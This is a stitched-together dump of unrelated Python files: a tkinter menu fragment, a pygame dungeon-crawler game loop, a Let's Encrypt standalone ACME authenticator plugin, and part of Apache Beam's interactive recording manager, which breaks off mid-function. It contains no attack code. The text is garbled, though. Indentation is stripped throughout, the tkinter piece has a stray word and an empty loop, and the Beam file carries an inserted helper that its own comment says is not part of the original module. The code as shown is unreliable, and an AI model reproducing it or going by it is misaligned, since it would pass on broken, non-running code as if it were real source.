frameHome.place(x = -0, y = 0) # x = 0
NumButtons = 6
Buttons = []
for Button in range(NumButtons):
B = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
B.place(x = -0, y = Button*62) # 212f3d # x = 0
Buttons.append(B)
Tarjeta
OptionSqrs = []
colors = []
Jugadores = []
for i in range(len(Jugadores)):
O = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
# ------------------------------------------------------------------------------------------
# EVENTS AND BINDINGS
# ------------------------------------------------------------------------------------------
frameHeader.bind('<Motion>', moveHeader)
frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
list(map(lambda Button: Button.bind("<Motion>", lambda event,
arg = Button: DetectButton(arg, event)), Buttons))
list(map(lambda Button: Button.bind("<Leave>", lambda event,
arg = Button: LeaveButton(arg, event)), Buttons))
window.bind("<Escape>", quit)
tk.mainloop()
|
Game.py
|
import time
import sys
import random
import sqlite3
from threading import Thread, Timer
import pygame.font
from files.ui import Bar, Button
from files.enemies import *
from files.environment_classes import Wall, Floor
from files.items import *
from files.global_stuff import *
from files.units_characteristics import increase_mob_characteristics, make_default_mob_characteristics
# pygame stuff below
print(WIDTH, HEIGHT)
pygame.init()
pygame.mixer.init()
game_instance = None
screen = pygame.display.set_mode((WIDTH, HEIGHT), pygame.FULLSCREEN | pygame.DOUBLEBUF, 16)
clock = pygame.time.Clock()
font = pygame.font.Font("files/font1.ttf", 36)
font_splash_boot = pygame.font.SysFont('rockwell', 100)
PLAY_ANIMATION = pygame.USEREVENT + 1
pygame.event.set_allowed([pygame.QUIT, pygame.KEYDOWN, pygame.KEYUP, PLAY_ANIMATION])
pygame.time.set_timer(PLAY_ANIMATION, 100)
pygame.display.set_caption("Knights of souls! V1.0")
class Game:
player_start_pos = [(128, 448), (128, 576), (320, 576), (320, 448)]
def __init__(self, chosen_hero):
self.left_walls = []
self.right_walls = []
self.other_environment = []
self.current_level_mobs = []
self.items_on_maps = []
self.bar_group = pygame.sprite.Group()
self.banners_group = pygame.sprite.Group()
self.buttons_group = pygame.sprite.Group()
self.running = False
self.level_just_finished = False
self.playing = True
self.quitting = False
self.paused = False
self.current_level = 0
self.last_level = False
self.floor = 1
self.dx = 576
self.on_player_die_timer = False
self.render_text = ""
self.transitioning = []
self.transition_counter = 255
self.generate_levels()
self.player = chosen_hero(*random.choice(self.player_start_pos))
# ui stuff
self.hp_bar = Bar(50, HEIGHT - 170, pygame.Color('red'), self.player, "hp", "max_hp", screen, self.bar_group)
self.armor_bar = Bar(50, HEIGHT - 110, pygame.Color('grey'), self.player, "armor", "max_armor", screen,
self.bar_group)
self.exit_button = False
def quit_this_window(self):
change_draw_area(0, 0, WIDTH, HEIGHT)
particle_group.empty()
hitbox_group.empty()
all_sprites.empty()
con = sqlite3.connect("files/db.sqlite")
cur = con.cursor()
for i in temp_stats:
update_statistics(i, cur)
con.commit()
con.close()
make_default_mob_characteristics()
for i in temp_stats:
temp_stats[i] = 0
self.running = False
def exit_button_pressed(self):
self.quitting = True
self.exit_button.kill()
self.render_text = ["Cleaning battlefield..."]
self.transitioning = [self.fade_in, self.render_center_text]
self.playing = False
Timer(3, self.quit_this_window).start()
def fade_in(self):
surface = pygame.Surface((WIDTH, HEIGHT)).convert_alpha()
surface.fill(pygame.Color(0, 0, 0, int(self.transition_counter)))
screen.blit(surface, (0, 0))
self.transition_counter += 2
if self.transition_counter >= 255:
self.transitioning = []
def fade_out(self):
surface = pygame.Surface((WIDTH, HEIGHT)).convert_alpha()
surface.fill(pygame.Color(0, 0, 0, int(self.transition_counter)))
screen.blit(surface, (0, 0))
self.transition_counter -= 1.5
if self.transition_counter <= 0:
self.transitioning = []
def render_center_text(self):
y = -60
for str_text in self.render_text:
text = font_splash_boot.render(str_text, True, (255, 255, 255))
text.set_alpha(self.transition_counter)
dx, dy = text.get_width() // 2, text.get_height() // 2
screen.blit(text, (WIDTH // 2 - dx, HEIGHT // 2 - dy + y))
y += 120
def on_player_die(self):
self.quitting = True
a = sum([g for i, g in temp_stats.items()])
self.render_text = ["YOU DIED", f'Enemies killed: {a}']
self.transitioning = [self.fade_in, self.render_center_text]
self.playing = False
Timer(5, self.quit_this_window).start()
def generate_levels(self):
# creating START room!
self.other_environment.append(Wall(0, 256, "Environment/MiniRoom/TopWall.png"))
self.other_environment.append(Wall(0, 704, "Environment/MiniRoom/BottomWall.png"))
self.other_environment.append(Wall(0, 256, "Environment/MiniRoom/LeftWall0.png"))
self.other_environment.append(Wall(self.dx - 64, 256, "Environment/MiniRoom/RightWall1.png"))
self.other_environment.append(Wall(self.dx - 64, 576, "Environment/MiniRoom/RightWall2.png"))
Floor(0, 256, "Environment/MiniRoom/Floor.png")
for i in range(0, 5):
self.other_environment.append(Wall(1472 * i + self.dx, 0, "Environment/TopWall.png"))
self.left_walls.append((Wall(1472 * i + self.dx, 0, "Environment/LeftWall1.png"),
Wall(1472 * i + self.dx, 576, "Environment/LeftWall2.png")))
self.right_walls.append(Wall(1472 * i + 1408 + self.dx, 0, "Environment/RightWall0.png"))
self.other_environment.append(Wall(1472 * i + self.dx, 960, "Environment/BottomWall.png"))
self.other_environment.append(Floor(1472 * i + self.dx, 0, "Environment/floor.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 256, "Environment/MiniRoom/TopWall.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 704, "Environment/MiniRoom/BottomWall.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 256, "Environment/MiniRoom/LeftWall1.png"))
self.other_environment.append(Wall(self.dx + 1472 * 5, 576, "Environment/MiniRoom/LeftWall2.png"))
self.other_environment.append(Wall(self.dx * 2 - 64 + 1472 * 5, 256, "Environment/MiniRoom/RightWall0.png"))
self.other_environment.append(Floor(self.dx + 1472 * 5, 256, "Environment/MiniRoom/Floor.png"))
self.transitioning = [self.fade_out, self.render_center_text]
self.render_text = [f"FLOOR {self.floor}", "Welcome to the dungeons"]
def next_floor(self):
self.level_just_finished = False
self.playing = False
self.transition_counter = 0
self.transitioning = [self.fade_in]
for i in self.items_on_maps:
if not (isinstance(i, TwinMirror) or isinstance(i, ElectricRing)):
i.die()
for i in self.right_walls + self.left_walls + self.other_environment:
try:
i.die()
except Exception:
pass
self.items_on_maps.clear()
self.right_walls.clear()
self.left_walls.clear()
self.other_environment.clear()
self.generate_levels()
self.player.set_pos(*self.player_start_pos[0])
self.level_just_finished = True
self.last_level = False
self.current_level = 0
self.floor += 1
increase_mob_characteristics(self.floor)
self.render_text = [f"FLOOR {self.floor}", "Mobs became more dangerous"]
while self.transitioning:
time.sleep(0.25)
self.transition_counter = 255
self.transitioning = [self.fade_out, self.render_center_text]
self.playing = True
con = sqlite3.connect("files/db.sqlite")
cur = con.cursor()
for i in temp_stats:
update_statistics(i, cur)
con.commit()
con.close()
def level_finished(self):
print("LEVEL FINISHED")
self.level_just_finished = True
self.right_walls[0].die()
del self.right_walls[0]
self.other_environment.append(
Wall(1472 * (self.current_level - 1) + 1408 + self.dx, 576, "Environment/RightWall2.png"))
self.other_environment.append(
Wall(1472 * (self.current_level - 1) + 1408 + self.dx, 0, "Environment/RightWall1.png"))
if self.player.apple_bag_count:
self.player.max_hp += self.player.apple_bag_count
self.player.heal(self.player.apple_bag_count)
if self.current_level == 5:
self.last_level = True
self.items_on_maps.append(get_random_epic_item()(1472 * (self.current_level - 0.5) + self.dx, 512))
else:
self.items_on_maps.append(get_random_item()(1472 * (self.current_level - 0.5) + self.dx, 512))
def start_wave(self):
print("START WAVE")
self.level_just_finished = False
self.left_walls[0][0].die()
self.left_walls[0][1].die()
del self.left_walls[0]
self.left_walls.append(Wall(1472 * (self.current_level - 1) + self.dx, 0, "Environment/LeftWall0.png"))
for i in range(self.current_level + self.floor):
temp = random.choice([MiniGolem, Snake, Tree, Dog, IceSoul, FireSoul])
self.current_level_mobs.append(
temp(random.randrange(1472 * (self.current_level - 1) + TILE_WIDTH + self.dx,
1472 * (self.current_level - 1) + 1000 + self.dx),
random.randrange(TILE_HEIGHT * 2, 1024 - TILE_HEIGHT * 3),
[self.player])
)
def start_boss_fighting(self):
print("START BOSS FIGHT")
# closing door
self.level_just_finished = False
self.left_walls[0][0].die()
self.left_walls[0][1].die()
del self.left_walls[0]
self.left_walls.append(Wall(1472 * (self.current_level - 1) + self.dx, 0, "Environment/LeftWall0.png"))
temp = random.choice([DragonBoss, Golem, NecroBoss, Hunter])(1472 * (self.current_level - 0.5)
+ self.dx, 512, [self.player])
self.current_level_mobs.append(temp)
Bar(WIDTH // 2, 120, pygame.Color("red"), self.current_level_mobs[0], "hp",
"max_hp", screen, self.bar_group, text=f"{temp.name} HP", c=True, len_=WIDTH * 0.8)
def run(self):
self.level_just_finished = True
self.running = True
background_color = (34, 32, 53)
while self.running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit(0)
elif event.type == PLAY_ANIMATION:
for _obj in play_animation_group:
_obj.change_image()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
if self.quitting is True:
continue
self.paused = False if self.paused else True
if self.paused:
self.exit_button = Button(WIDTH // 2, HEIGHT // 2, self.buttons_group, "main_menu.png",
"main_menu_pressed.png", self.exit_button_pressed)
else:
self.exit_button.kill()
elif event.key == pygame.K_LSHIFT:
self.player.running = True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_LSHIFT:
self.player.running = False
elif event.type == pygame.MOUSEBUTTONDOWN:
self.player.attack(*event.pos)
if self.paused:
t = font.render(f" GAME PAUSED", True, pygame.Color("BLACK"))
screen.blit(t, (WIDTH // 2 - t.get_rect().w // 2, HEIGHT // 2 - 100 - t.get_rect().h // 2))
elif self.playing:
if self.player.hp <= 0 and not self.on_player_die_timer:
Timer(1, self.on_player_die).start()
self.on_player_die_timer = True
# checking game status
if self.level_just_finished:
if self.player.global_x > 1472 * self.current_level + 64 + self.dx:
self.current_level += 1
if self.current_level == 5:
self.start_boss_fighting()
elif self.current_level != 6:
self.start_wave()
else:
Thread(target=self.next_floor, daemon=True).start()
elif 0 < self.current_level and len(self.current_level_mobs) == 0 and not self.last_level:
self.level_finished()
self.player.key_input()
if self.player.gun:
self.player.look_at_mouse()
all_sprites.update()
particle_group.update()
CAMERA.update(self.player)
screen.fill(background_color)
all_sprites.draw(screen)
particle_group.draw(screen)
if self.player.has_welding_helmet:  # all of this is for the Welding Helmet ITEM
pygame.draw.rect(screen, pygame.Color("black"), [0, 0, draw_area['l'], HEIGHT])
pygame.draw.rect(screen, pygame.Color("black"), [draw_area['r'], 0, WIDTH - draw_area['r'], HEIGHT])
pygame.draw.rect(screen, pygame.Color("black"), [draw_area['l'], 0, draw_area['r'] - draw_area['l'],
draw_area['t']])
pygame.draw.rect(screen, pygame.Color("black"),
[draw_area['l'], draw_area['b'], draw_area['r'] - draw_area['l'],
draw_area['b'] - draw_area['t']])
# screen.blit(font.render(f" HP: {self.player.hp}", True, pygame.Color("white")), (50, 20))
# screen.blit(font.render(f" Current lvl: {self.current_level}", True, pygame.Color("white")),
# (50, 40))
# screen.blit(font.render(f"FPS: {clock.get_fps()}", True, pygame.Color("white")), (50, 60))
# screen.blit(
# font.render(f" ARMOR: {self.player.armor} DMG: {self.player.damage}", True, pygame.Color("white")),
# (50, 80))
# screen.blit(font.render(f" prt: {self.player.protection}", True, pygame.Color("white")),
# (50, 100))
self.bar_group.update()
items_text.update()
# updating buttons
self.buttons_group.update()
self.buttons_group.draw(screen)
for i in self.transitioning:
i()
for i in delete_later:
if i in self.current_level_mobs:
self.current_level_mobs.remove(i)
if i.hitbox:
i.hitbox.kill()
i.kill()
delete_later.clear()
pygame.display.flip()
clock.tick(FPS)
def run(chosen_hero):
global game_instance
game_instance = Game(chosen_hero)
game_instance.run()
|
standalone.py
|
"""Standalone Authenticator."""
import argparse
import collections
import logging
import random
import socket
import threading
import OpenSSL
import six
import zope.component
import zope.interface
from acme import challenges
from acme import crypto_util as acme_crypto_util
from acme import standalone as acme_standalone
from letsencrypt import errors
from letsencrypt import interfaces
from letsencrypt.plugins import common
from letsencrypt.plugins import util
logger = logging.getLogger(__name__)
class ServerManager(object):
"""Standalone servers manager.
Manager for `ACMEServer` and `ACMETLSServer` instances.
`certs` and `simple_http_resources` correspond to
`acme.crypto_util.SSLSocket.certs` and
`acme.crypto_util.SSLSocket.simple_http_resources` respectively. All
created servers share the same certificates and resources, so if
you're running both TLS and non-TLS instances, HTTP01 handlers
will serve the same URLs!
"""
_Instance = collections.namedtuple("_Instance", "server thread")
def __init__(self, certs, simple_http_resources):
self._instances = {}
self.certs = certs
self.simple_http_resources = simple_http_resources
def run(self, port, challenge_type):
"""Run ACME server on specified ``port``.
This method is idempotent, i.e. all calls with the same pair of
``(port, challenge_type)`` will reuse the same server.
:param int port: Port to run the server on.
:param challenge_type: Subclass of `acme.challenges.Challenge`,
either `acme.challenges.HTTP01` or `acme.challenges.DVSNI`.
:returns: Server instance.
:rtype: ACMEServerMixin
"""
assert challenge_type in (challenges.DVSNI, challenges.HTTP01)
if port in self._instances:
return self._instances[port].server
address = ("", port)
try:
if challenge_type is challenges.DVSNI:
server = acme_standalone.DVSNIServer(address, self.certs)
else: # challenges.HTTP01
server = acme_standalone.HTTP01Server(
address, self.simple_http_resources)
except socket.error as error:
raise errors.StandaloneBindError(error, port)
thread = threading.Thread(
# pylint: disable=no-member
target=server.serve_forever)
thread.start()
# if port == 0, then random free port on OS is taken
# pylint: disable=no-member
real_port = server.socket.getsockname()[1]
self._instances[real_port] = self._Instance(server, thread)
return server
def stop(self, port):
"""Stop ACME server running on the specified ``port``.
:param int port:
"""
instance = self._instances[port]
logger.debug("Stopping server at %s:%d...",
*instance.server.socket.getsockname()[:2])
instance.server.shutdown()
instance.thread.join()
del self._instances[port]
def running(self):
"""Return all running instances.
Once the server is stopped using `stop`, it will not be
returned.
:returns: Mapping from ``port`` to ``server``.
:rtype: dict
"""
return dict((port, instance.server) for port, instance
in six.iteritems(self._instances))
SUPPORTED_CHALLENGES = set([challenges.DVSNI, challenges.HTTP01])
def supported_challenges_validator(data):
"""Supported challenges validator for the `argparse`.
It should be passed as `type` argument to `add_argument`.
"""
challs = data.split(",")
unrecognized = [name for name in challs
if name not in challenges.Challenge.TYPES]
if unrecognized:
raise argparse.ArgumentTypeError(
"Unrecognized challenges: {0}".format(", ".join(unrecognized)))
choices = set(chall.typ for chall in SUPPORTED_CHALLENGES)
if not set(challs).issubset(choices):
raise argparse.ArgumentTypeError(
"Plugin does not support the following (valid) "
"challenges: {0}".format(", ".join(set(challs) - choices)))
return data
class Authenticator(common.Plugin):
"""Standalone Authenticator.
This authenticator creates its own ephemeral TCP listener on the
necessary port in order to respond to incoming DVSNI and HTTP01
challenges from the certificate authority. Therefore, it does not
rely on any existing server program.
"""
zope.interface.implements(interfaces.IAuthenticator)
zope.interface.classProvides(interfaces.IPluginFactory)
description = "Automatically use a temporary webserver"
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
# one self-signed key for all DVSNI and HTTP01 certificates
self.key = OpenSSL.crypto.PKey()
self.key.generate_key(OpenSSL.crypto.TYPE_RSA, bits=2048)
# TODO: generate only when the first HTTP01 challenge is solved
self.simple_http_cert = acme_crypto_util.gen_ss_cert(
self.key, domains=["temp server"])
self.served = collections.defaultdict(set)
# Stuff below is shared across threads (i.e. servers read
# values, main thread writes). Due to the nature of CPython's
# GIL, the operations are safe, c.f.
# https://docs.python.org/2/faq/library.html#what-kinds-of-global-value-mutation-are-thread-safe
self.certs = {}
self.simple_http_resources = set()
self.servers = ServerManager(self.certs, self.simple_http_resources)
@classmethod
def add_parser_arguments(cls, add):
add("supported-challenges", help="Supported challenges, "
"order preferences are randomly chosen.",
type=supported_challenges_validator, default=",".join(
sorted(chall.typ for chall in SUPPORTED_CHALLENGES)))
@property
def supported_challenges(self):
"""Challenges supported by this plugin."""
return set(challenges.Challenge.TYPES[name] for name in
self.conf("supported-challenges").split(","))
@property
def _necessary_ports(self):
necessary_ports = set()
if challenges.HTTP01 in self.supported_challenges:
necessary_ports.add(self.config.http01_port)
if challenges.DVSNI in self.supported_challenges:
necessary_ports.add(self.config.dvsni_port)
return necessary_ports
def more_info(self): # pylint: disable=missing-docstring
return("This authenticator creates its own ephemeral TCP listener "
"on the necessary port in order to respond to incoming DVSNI "
"and HTTP01 challenges from the certificate authority. "
"Therefore, it does not rely on any existing server program.")
def prepare(self): # pylint: disable=missing-docstring
pass
def get_chall_pref(self, domain):
# pylint: disable=unused-argument,missing-docstring
chall_pref = list(self.supported_challenges)
random.shuffle(chall_pref) # 50% for each challenge
return chall_pref
def perform(self, achalls): # pylint: disable=missing-docstring
if any(util.already_listening(port) for port in self._necessary_ports):
raise errors.MisconfigurationError(
"At least one of the (possibly) required ports is "
"already taken.")
try:
return self.perform2(achalls)
except errors.StandaloneBindError as error:
display = zope.component.getUtility(interfaces.IDisplay)
if error.socket_error.errno == socket.errno.EACCES:
display.notification(
"Could not bind TCP port {0} because you don't have "
"the appropriate permissions (for example, you "
"aren't running this program as "
"root).".format(error.port))
elif error.socket_error.errno == socket.errno.EADDRINUSE:
display.notification(
"Could not bind TCP port {0} because it is already in "
"use by another process on this system (such as a web "
"server). Please stop the program in question and then "
"try again.".format(error.port))
else:
raise # XXX: How to handle unknown errors in binding?
def perform2(self, achalls):
"""Perform achallenges without IDisplay interaction."""
responses = []
for achall in achalls:
if isinstance(achall.chall, challenges.HTTP01):
server = self.servers.run(
self.config.http01_port, challenges.HTTP01)
response, validation = achall.response_and_validation()
self.simple_http_resources.add(
acme_standalone.HTTP01RequestHandler.HTTP01Resource(
chall=achall.chall, response=response,
validation=validation))
cert = self.simple_http_cert
domain = achall.domain
else: # DVSNI
server = self.servers.run(self.config.dvsni_port, challenges.DVSNI)
response, cert, _ = achall.gen_cert_and_response(self.key)
domain = response.z_domain
self.certs[domain] = (self.key, cert)
self.served[server].add(achall)
responses.append(response)
return responses
def cleanup(self, achalls): # pylint: disable=missing-docstring
# reduce self.served and close servers if no challenges are being served
for server, server_achalls in self.served.items():
for achall in achalls:
if achall in server_achalls:
server_achalls.remove(achall)
for port, server in six.iteritems(self.servers.running()):
if not self.served[server]:
self.servers.stop(port)
|
recording_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import threading
import time
import warnings
import pandas as pd
import apache_beam as beam
from apache_beam.dataframe.frame_base import DeferredBase
from apache_beam.portability.api.beam_runner_api_pb2 import TestStreamPayload
from apache_beam.runners.interactive import background_caching_job as bcj
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive import interactive_runner as ir
from apache_beam.runners.interactive import pipeline_fragment as pf
from apache_beam.runners.interactive import utils
from apache_beam.runners.interactive.caching.cacheable import CacheKey
from apache_beam.runners.runner import PipelineState
_LOGGER = logging.getLogger(__name__)
class ElementStream:
"""A stream of elements from a given PCollection."""
def __init__(
self,
pcoll, # type: beam.pvalue.PCollection
var, # type: str
cache_key, # type: str
max_n, # type: int
max_duration_secs # type: float
):
self._pcoll = pcoll
self._cache_key = cache_key
self._pipeline = ie.current_env().user_pipeline(pcoll.pipeline)
self._var = var
self._n = max_n
self._duration_secs = max_duration_secs
# A small state variable that, when True, indicates that no more new elements
# will be yielded if read() is called again.
self._done = False
@property
def var(self):
# type: () -> str
"""Returns the variable named that defined this PCollection."""
return self._var
@property
def pcoll(self):
# type: () -> beam.pvalue.PCollection
"""Returns the PCollection that supplies this stream with data."""
return self._pcoll
@property
def cache_key(self):
# type: () -> str
"""Returns the cache key for this stream."""
return self._cache_key
def display_id(self, suffix):
# type: (str) -> str
"""Returns a unique id able to be displayed in a web browser."""
return utils.obfuscate(self._cache_key, suffix)
def is_computed(self):
# type: () -> bool
"""Returns True if no more elements will be recorded."""
return self._pcoll in ie.current_env().computed_pcollections
def is_done(self):
# type: () -> bool
"""Returns True if no more new elements will be yielded."""
return self._done
def read(self, tail=True):
# type: (bool) -> Any
"""Reads the elements currently recorded."""
# Get the cache manager and wait until the file exists.
cache_manager = ie.current_env().get_cache_manager(self._pipeline)
# Retrieve the coder for the particular PCollection which will be used to
# decode elements read from cache.
coder = cache_manager.load_pcoder('full', self._cache_key)
# Read the elements from the cache.
# Import limiters here to prevent a circular import.
from apache_beam.runners.interactive.options.capture_limiters import CountLimiter
from apache_beam.runners.interactive.options.capture_limiters import ProcessingTimeLimiter
reader, _ = cache_manager.read('full', self._cache_key, tail=tail)
# Because a single TestStreamFileRecord can yield multiple elements, we
# limit the count again here in the to_element_list call.
#
# There are two ways of exiting this loop: either a limiter was triggered or
# all elements from the cache were read. In the latter situation, it may be
# the case that the pipeline was still running. Thus, another invocation of
# `read` will yield new elements.
count_limiter = CountLimiter(self._n)
time_limiter = ProcessingTimeLimiter(self._duration_secs)
limiters = (count_limiter, time_limiter)
for e in utils.to_element_list(reader,
coder,
include_window_info=True,
n=self._n,
include_time_events=True):
# From the to_element_list we either get TestStreamPayload.Events if
# include_time_events or decoded elements from the reader. Make sure we
# only count the decoded elements to break early.
if isinstance(e, TestStreamPayload.Event):
time_limiter.update(e)
else:
count_limiter.update(e)
yield e
if any(l.is_triggered() for l in limiters):
break
# A limiter being triggered means that we have fulfilled the user's request.
# This implies that reading from the cache again won't yield any new
# elements. The same applies when the user pipeline has been terminated.
if any(l.is_triggered()
for l in limiters) or ie.current_env().is_terminated(self._pipeline):
self._done = True
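# --- Illustrative sketch (not part of the original module) ---
# The read() loop above exits either when a limiter triggers or when the
# cache is exhausted. The helper below is a minimal, hypothetical sketch of
# that dual-exit pattern, with a plain count/time check standing in for
# CountLimiter and ProcessingTimeLimiter; it is not part of Beam's API.
def _sketch_read_with_limits(elements, max_n, max_duration_secs):
  """Yields elements until a count or time limit triggers, mirroring read()."""
  import time as _time
  start = _time.time()
  count = 0
  for element in elements:
    count += 1
    yield element
    if count >= max_n or _time.time() - start >= max_duration_secs:
      # A triggered limiter ends the read early; a later call can pick up
      # newly cached elements, just like ElementStream.read().
      break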
class Recording:
"""A group of PCollections from a given pipeline run."""
def __init__(
self,
user_pipeline, # type: beam.Pipeline
pcolls, # type: List[beam.pvalue.PCollection]
result, # type: beam.runner.PipelineResult
max_n, # type: int
max_duration_secs, # type: float
):
self._user_pipeline = user_pipeline
self._result = result
self._result_lock = threading.Lock()
self._pcolls = pcolls
pcoll_var = lambda pcoll: {v: k
for k, v in utils.pcoll_by_name().items()}.get(
pcoll, None)
self._streams = {
pcoll: ElementStream(
pcoll,
pcoll_var(pcoll),
CacheKey.from_pcoll(pcoll_var(pcoll), pcoll).to_str(),
max_n,
max_duration_secs)
for pcoll in pcolls
}
self._start = time.time()
self._duration_secs = max_duration_secs
self._set_computed = bcj.is_cache_complete(str(id(user_pipeline)))
# Run a separate thread for marking the PCollections done. This is because
# the pipeline run may be asynchronous.
self._mark_computed = threading.Thread(target=self._mark_all_computed)
self._mark_computed.daemon = True
self._mark_computed.start()
def _mark_all_computed(self):
# type: () -> None
"""Marks all the PCollections upon a successful pipeline run."""
if not self._result:
return
while not PipelineState.is_terminal(self._result.state):
with self._result_lock:
bcj = ie.current_env().get_background_caching_job(self._user_pipeline)
if bcj and bcj.is_done():
self._result.wait_until_finish()
elif time.time() - self._start >= self._duration_secs:
self._result.cancel()
self._result.wait_until_finish()
elif all(s.is_done() for s in self._streams.values()):
self._result.cancel()
self._result.wait_until_finish()
time.sleep(0.1)
# Mark the PCollections as computed so that Interactive Beam doesn't need to
# recompute them.
if self._result.state is PipelineState.DONE and self._set_computed:
ie.current_env().mark_pcollection_computed(self._pcolls)
def is_computed(self):
# type: () -> bool
"""Returns True if all PCollections are computed."""
return all(s.is_computed() for s in self._streams.values())
def stream(self, pcoll):
# type: (beam.pvalue.PCollection) -> ElementStream
"""Returns an ElementStream for a given PCollection."""
return self._streams[pcoll]
def computed(self):
# type: () -> dict[beam.pvalue.PCollection, ElementStream]
"""Returns all computed ElementStreams."""
return {p: s for p, s in self._streams.items() if s.is_computed()}
def uncomputed(self):
# type: () -> dict[beam.pvalue.PCollection, ElementStream]
"""Returns all uncomputed ElementStreams."""
return {p: s for p, s in self._streams.items() if not s.is_computed()}
def cancel(self):
# type: () -> None
"""Cancels the recording."""
with self._result_lock:
self._result.cancel()
def wait_until_finish(self):
# type: () -> None
"""Waits until the pipeline is done and returns the final state.
This also marks any PCollections as computed right away if the pipeline is
successful.
"""
if not self._result:
return beam.runners.runner.PipelineState.DONE
self._mark_computed.join()
return self._result.state
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
cache_manager = ie.current_env().get_cache_manager(self._user_pipeline)
size = sum(
cache_manager.size('full', s.cache_key) for s in self._streams.values())
return {'size': size, 'duration': self._duration_secs}
class RecordingManager:
"""Manages recordings of PCollections for a given pipeline."""
def __init__(self, user_pipeline, pipeline_var=None, test_limiters=None):
# type: (beam.Pipeline, str, list[Limiter]) -> None
self.user_pipeline = user_pipeline # type: beam.Pipeline
self.pipeline_var = pipeline_var if pipeline_var else '' # type: str
self._recordings = set() # type: set[Recording]
self._start_time_sec = 0 # type: float
self._test_limiters = test_limiters if test_limiters else []
def _watch(self, pcolls):
# type: (List[beam.pvalue.PCollection]) -> None
"""Watch any pcollections not being watched.
This allows for the underlying caching layer to identify the PCollection as
something to be cached.
"""
watched_pcollections = set()
watched_dataframes = set()
for watching in ie.current_env().watching():
for _, val in watching:
if isinstance(val, beam.pvalue.PCollection):
watched_pcollections.add(val)
elif isinstance(val, DeferredBase):
watched_dataframes.add(val)
# Convert them one-by-one to generate a unique label for each. This allows
# caching at a finer granularity.
#
# TODO(BEAM-12388): investigate the error about mixing PCollections from
# multiple pipelines when using the default label.
for df in watched_dataframes:
pcoll, _ = utils.deferred_df_to_pcollection(df)
watched_pcollections.add(pcoll)
for pcoll in pcolls:
if pcoll not in watched_pcollections:
ie.current_env().watch(
{'anonymous_pcollection_{}'.format(id(pcoll)): pcoll})
def _clear(self):
# type: () -> None
"""Clears the recording of all non-source PCollections."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
# Only clear the PCollections that aren't being populated from the
# BackgroundCachingJob.
computed = ie.current_env().computed_pcollections
cacheables = [
c for c in utils.cacheables().values()
if c.pcoll.pipeline is self.user_pipeline and c.pcoll not in computed
]
all_cached = set(str(c.to_key()) for c in cacheables)
source_pcolls = getattr(cache_manager, 'capture_keys', set())
to_clear = all_cached - source_pcolls
self._clear_pcolls(cache_manager, set(to_clear))
def _clear_pcolls(self, cache_manager, pcolls):
for pc in pcolls:
cache_manager.clear('full', pc)
def clear(self):
# type: () -> None
"""Clears all cached PCollections for this RecordingManager."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
if cache_manager:
cache_manager.cleanup()
def cancel(self):
# type: (None) -> None
"""Cancels the current background recording job."""
bcj.attempt_to_cancel_background_caching_job(self.user_pipeline)
for r in self._recordings:
r.wait_until_finish()
self._recordings = set()
# The recordings rely on a reference to the BCJ to correctly finish. So we
# evict the BCJ after they complete.
ie.current_env().evict_background_caching_job(self.user_pipeline)
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
capture_size = getattr(cache_manager, 'capture_size', 0)
descriptions = [r.describe() for r in self._recordings]
size = sum(d['size'] for d in descriptions) + capture_size
start = self._start_time_sec
bcj = ie.current_env().get_background_caching_job(self.user_pipeline)
if bcj:
state = bcj.state
else:
state = PipelineState.STOPPED
return {
'size': size,
'start': start,
'state': state,
'pipeline_var': self.pipeline_var
}
def record_pipeline(self):
# type: () -> bool
"""Starts a background caching job for this RecordingManager's pipeline."""
runner = self.user_pipeline.runner
if isinstance(runner, ir.InteractiveRunner):
runner = runner._underlying_runner
# Make sure that sources without a user reference are still cached.
ie.current_env().add_user_pipeline(self.user_pipeline)
utils.watch_sources(self.user_pipeline)
# Attempt to run background caching job to record any sources.
if ie.current_env().is_in_ipython:
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
if bcj.attempt_to_run_background_caching_job(
runner,
self.user_pipeline,
options=self.user_pipeline.options,
limiters=self._test_limiters):
self._start_time_sec = time.time()
return True
return False
def record(self, pcolls, max_n, max_duration):
# type: (List[beam.pvalue.PCollection], int, Union[int,str]) -> Recording
"""Records the given PCollections."""
# Assert that all PCollections come from the same user_pipeline.
for pcoll in pcolls:
assert pcoll.pipeline is self.user_pipeline, (
'{} belongs to a different user-defined pipeline ({}) than that of'
' other PCollections ({}).'.format(
pcoll, pcoll.pipeline, self.user_pipeline))
if isinstance(max_duration, str) and max_duration != 'inf':
max_duration_secs = pd.to_timedelta(max_duration).total_seconds()
else:
max_duration_secs = max_duration
# Make sure that all PCollections to be shown are watched. If a PCollection
# has not been watched, make up a variable name for that PCollection and
# watch it. No validation is needed here because the watch logic can handle
# arbitrary variables.
self._watch(pcolls)
self.record_pipeline()
# Get the subset of computed PCollections. These do not need to be recomputed.
computed_pcolls = set(
pcoll for pcoll in pcolls
if pcoll in ie.current_env().computed_pcollections)
# Start a pipeline fragment to start computing the PCollections.
